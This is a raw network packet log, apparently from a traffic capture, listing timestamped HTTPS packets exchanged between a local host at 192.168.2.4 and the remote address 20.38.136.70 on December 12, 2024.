                                                                                                                                                                                                          Dec 12, 2024 00:30:07.576951027 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.584781885 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.584836006 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.585201025 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.585263968 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.586319923 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.586376905 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.586378098 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.586391926 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.586419106 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587147951 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587193012 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587193966 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587205887 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587236881 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587631941 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587677956 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587687969 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.587729931 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.588669062 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.588721037 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.662681103 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.662786007 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.664697886 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.664755106 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.668943882 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.668998957 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.671449900 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.671504974 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.673773050 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.673824072 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.677408934 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.677460909 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.682415009 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.682475090 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.682821989 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.682878017 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.686265945 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.686328888 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.689941883 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.690002918 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.691756964 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.691817045 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.694561958 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.694623947 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.698117971 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.698183060 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.701838970 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.701900959 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.705302954 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.705363035 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.707365036 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.707422018 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.710858107 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.710916996 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.714392900 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.714441061 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.714467049 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.716233969 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.716295004 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.719897032 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.719957113 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.723439932 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.723504066 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.725284100 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.725338936 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.730159044 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.730218887 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.732482910 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.732546091 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.734601974 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.734658003 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.737974882 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.738035917 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.741503000 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.741574049 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.744236946 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.744292974 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.749974012 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.750034094 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.750046968 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.750099897 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.753519058 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.753587961 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.756896973 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.756974936 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.759252071 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.759310007 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.762419939 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.762470961 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.767343998 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.767400026 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.767971992 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.768023968 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.771944046 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.771997929 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.775105953 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.775155067 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.776993990 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.777044058 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.780597925 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.780653000 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.784122944 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.784188032 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.786092997 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.786159992 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.790577888 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.790642023 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.792289972 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.792351007 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.796004057 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.796066046 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.799591064 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.799652100 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.801404953 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.801461935 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.805062056 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.805116892 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.808705091 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.808767080 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.810581923 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.810648918 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.814112902 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.814173937 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.817739964 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.817821980 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.819538116 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.819602013 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.823242903 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.823303938 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.826843977 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.826903105 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.828573942 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.828634977 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.834255934 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.834326029 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.836289883 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.836359024 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.839612007 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.839677095 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.843241930 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.843312025 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.845151901 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.845218897 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.848683119 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.848753929 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.852324963 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.852385044 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.854177952 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.854240894 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.857804060 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.857896090 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.861665964 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.861713886 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.863437891 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.863495111 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.867430925 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.867487907 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.871438980 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.871491909 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.872528076 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.872587919 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.876529932 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.876583099 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.879471064 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.879529953 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.881879091 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.881942987 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.884629011 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.884695053 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.887427092 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.887485981 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.889064074 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.889157057 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.891616106 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.891679049 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.892992973 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.893049955 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.895493031 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.895550013 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.897808075 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.897870064 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.899132013 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.899214983 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.901596069 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.901680946 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.903934956 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.904000044 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.906353951 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.906419992 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.907803059 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.907866955 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.909591913 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.909647942 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.910451889 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.910523891 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.911447048 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:07.911510944 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.025428057 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.025512934 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.026067972 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.026139975 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.027056932 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.027133942 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.028688908 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.028768063 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.029458046 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.029550076 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.030369997 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.030436993 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.031513929 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.031594992 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.032161951 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.032242060 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.033013105 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.033076048 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.033884048 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.033952951 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.034773111 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.034827948 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.036259890 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.036317110 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.037072897 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.037138939 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.037923098 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.037982941 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.038839102 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.038898945 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.039664984 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.039733887 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.040446997 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.040510893 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.041340113 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.041399956 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.042172909 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.042229891 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.043790102 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.043852091 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.044560909 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.044622898 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.045211077 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.045268059 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.046073914 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.046132088 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.047063112 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.047125101 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.047712088 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.047770023 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.049256086 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.049318075 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.050091982 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.050153971 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.050988913 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.051065922 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.051866055 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.051935911 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.052712917 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.052778006 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.053541899 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.053600073 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.054362059 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.054426908 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.217889071 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.218075037 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.218499899 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.218559980 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.219327927 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.219393969 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.220084906 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.220145941 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.220936060 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.220994949 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.222524881 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.222589016 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.223332882 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.223395109 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.224267960 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.224328995 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.225106955 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.225171089 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.225936890 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.226006031 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.226762056 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.226825953 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.227588892 CET4435001620.38.136.70192.168.2.4
